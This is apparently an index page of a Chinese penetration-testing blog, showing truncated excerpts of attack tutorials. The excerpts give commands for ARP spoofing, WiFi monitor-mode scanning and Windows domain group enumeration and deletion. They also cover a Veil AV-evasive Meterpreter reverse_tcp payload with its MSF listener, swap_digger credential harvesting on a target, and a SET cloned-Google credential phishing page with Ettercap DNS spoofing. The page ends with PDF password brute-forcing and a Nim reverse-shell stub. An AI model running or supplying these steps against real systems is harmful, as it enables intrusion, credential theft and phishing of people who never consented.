渗透测试常用网站
渗透测试常用网站17CE:https://www.17ce.com/crt.sh:https://crt.sh/ICP备案查询网:https://www.beianx.cn/IP查询网:https://www.ip138.com/IP反查绑定域名:https://dns.aizhan.com/VirusTotal:https://www.virustotal.com/WhatWeb:https://whatweb.net/爱站工具网:https://whois.aizhan.com/天眼查:https://www.tianyancha.com/微步在线情报社区:https://x.threatbook.com/云悉指纹:https://www.yunsee.cn/站长之家Whois:https://whois.chinaz.com/子成君二级域名挖掘:http://z.zcjun.com/NETCRAFT:https://www.netcraft.com/WebScan:https://www.webscan.cc/GTFOBins:https://gtfobins.github.io ...
中间人攻击
中间人攻击-ARP欺骗arpspoof语法格式:
12345arpspoof [options] host #-i interface 指定接口 #-t target 指定ARP欺骗的目标 #-r 双向欺骗 与-t一起使用 #host 指定拦截包的主机 通常网关
开启路由转发:
12echo 1 > /proc/sys/net/ipv4/ip_forwardcat /proc/sys/net/ipv4/ip_forward #输出1时成功开启
查看攻击主机和目标主机ARP缓存表,得到网关信息:
1arp
举例:攻击主机IP为192.168.29.134,MAC为00:0c:29:79:95:9e;目标主机IP为192.168.29.134,MAC为00:0c:29:6c:5d:69;网关IP为192.168.29.2,MAC为00:50:56:f1:40:cb。
分别对目标主机和网关实施ARP攻击:
12arpspoof -i eth0 -t 192.168.29.135 192.168.29.2arpspoof -i eth0 -t 192.168 ...
无线网络渗透基础原理
无线网络渗透基础设置监听模式2.4GHz WiFi网卡1sudo airmon-ng start wlan0
随后系统WiFi断开,wlan0接口改名为wlan0mon。
5GHz WiFi网卡仅支持芯片为RT3572和RTL8812AU的无线网卡,前者开启方式同2.4G网络,后者需要手动开启。
安装驱动:
1sudo apt-get install realtek-rt188xxau-dkms
查看无线网卡模式:
1iwconfig
发现为被管理模式,先停止无线网卡接口,设置为监听模式,再启动:
1234ip link set wlan0 downiwconfig wlan0 mode monitorip link set wlan0 upiwconfig #发现为监听模式 接口名还为wlan0
网络扫描Airodump-ng1airodump-ng wlan0mon
输出结果中每列参数:
列名
含义
BSSID
无线AP的物理地址。
PWR
信号水平,信号值越高离AP越近。为-1时标识客户端不在能监听到的范围内。当BSSID和PWR两列都为-1时,网卡驱动 ...
内网渗透命令大全
内网渗透命令大全域常用操作命令1234567891011121314151617181920212223242526272829303132net group /domain #获得所有域用户组列表net group qq_group /domain #显示域中qq_group组的成员net group qq_group /del /domain #删除域中qq_group组net group qq_group qq /del/domain #删除域内qq_group群组中的成员qqnet group qq_group /add /domain #增加域中的群组net group "domain admins" /domain #获得域管理员列表net group "enterprise admins" /domain #获得企业管理员列表net localgroup administrators /domain #获取域内置administrators组用户(enterprise admins、domain admins)net group & ...
Veil免杀入门
Veil免杀入门启动:
1veil
使用Evasion工具:
1use Evation
查看支持的攻击载荷:
1list
选择攻击载荷:
1use cs/meterpreter/rev_tcp.py
查看配置信息并配置:
12optionsset LHOST 192.168.29.134
生成攻击载荷:
1generate
生成可执行文件payload.exe。
还有另一种生成方式,直接使用命令行生成:
1veil -t Evasion -p cs/meterpreter/rev_tcp.py --ip 192.168.195.150 --port 4444
在MSF设置监听:
1234use exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset LHOST 192.168.29.134exploit
成功启动Meterpreter会话。
swap_digger使用方法
swap_digger使用方法在目标机器上下载并运行:
123wget https://raw.githubusercontent.com/sevagas/swap_digger/master/swap_digger.shchmod +x swap_digger.shsudo ./swap_digger.sh -vx -c
-v输出冗余信息 -x获取扩展凭证 -c自动删除生成的工作目录。
功能有:自动提取swap并搜索Linux用户凭证、Web表单凭证、Web表单电子邮件、HTTP基本认证、WiFi SSID和密钥等。
SET常用方法
SET常用方法Web攻击向量依次选择选项1、2、3、1,即社会工程学攻击、Web攻击向量、证书获取攻击方式、使用Web模板,并输入目标主机IP地址,随后选择2,即克隆Google站点。
如果用户目录结构依赖/var/www/html目录,则需要复制/var/www/下所有文件到/var/www/html中,回车即可。
如果Apache等占用80端口,会提示关闭,y即可。
接下来需要使用Ettercap的dns_spoof插件实施ARP攻击和DNS欺骗。
修改/etc/ettercap/etter.dns,例如攻击主机IP为192.168.29.139,则添加:
1* A 192.168.29.139
使用Ettercap发起ARP攻击,启动dns_spoof插件,实施DNS欺骗:
1ettercap -Tq -M arp:remote -P dns_spoof /192.168.29.139// /192.168.29.2//
当目标主机访问任何网站时 ...
Recon-ng初探
Recon-ng初探模块安装Kali自带Recon-ng,但模块一个没装,得科学上网,然后recon-ng的shell中执行:
1marketplace install all
示例选择模块:
1modules load recon/domains-hosts/hackertarget
查看模块信息:
1info
设置目标:
1options set SOURCE blog.bbskali.cn
运行模块:
1show hosts
实战枚举百度网站子域名,并导出为csv。
12345678helpshow modulesuse recon/domains-hosts/baidu_siteshow optionsset SOURCE baidu.comrunuse reporting/csvrun
PDF加密解密
PDF加密解密给文件添加密码:
1pdftk kali.pdf output out.pdf user_pw 666666 #kali.pdf加密为out.pdf 密码为666666
暴力破解:
1pdfcrack -f out.pdf -n 6 -m 8 -c 0123456789 #-f要破解的文件 -n最短多少字符 -m 最长多少字符 -c使用的字符集
支持字典:
1pdfcrack -f out.pdf -w pass.txt
Nim入门
Nim入门配置按照实际情况配置IP及端口,保存文件为nimshell.nim。
123456789var targetIP="192.168.1.25" targetPort="4444"let exitMessage="Exiting.." changeDirectoryCommand="cd" defaultDirectory="C:\\"try: socket.connect(targetIP,Port(parseInt(targetPort)))
编译1nim c -d:mingw --app:gui nimshell.nim && mv nimshell.exe myshell.exe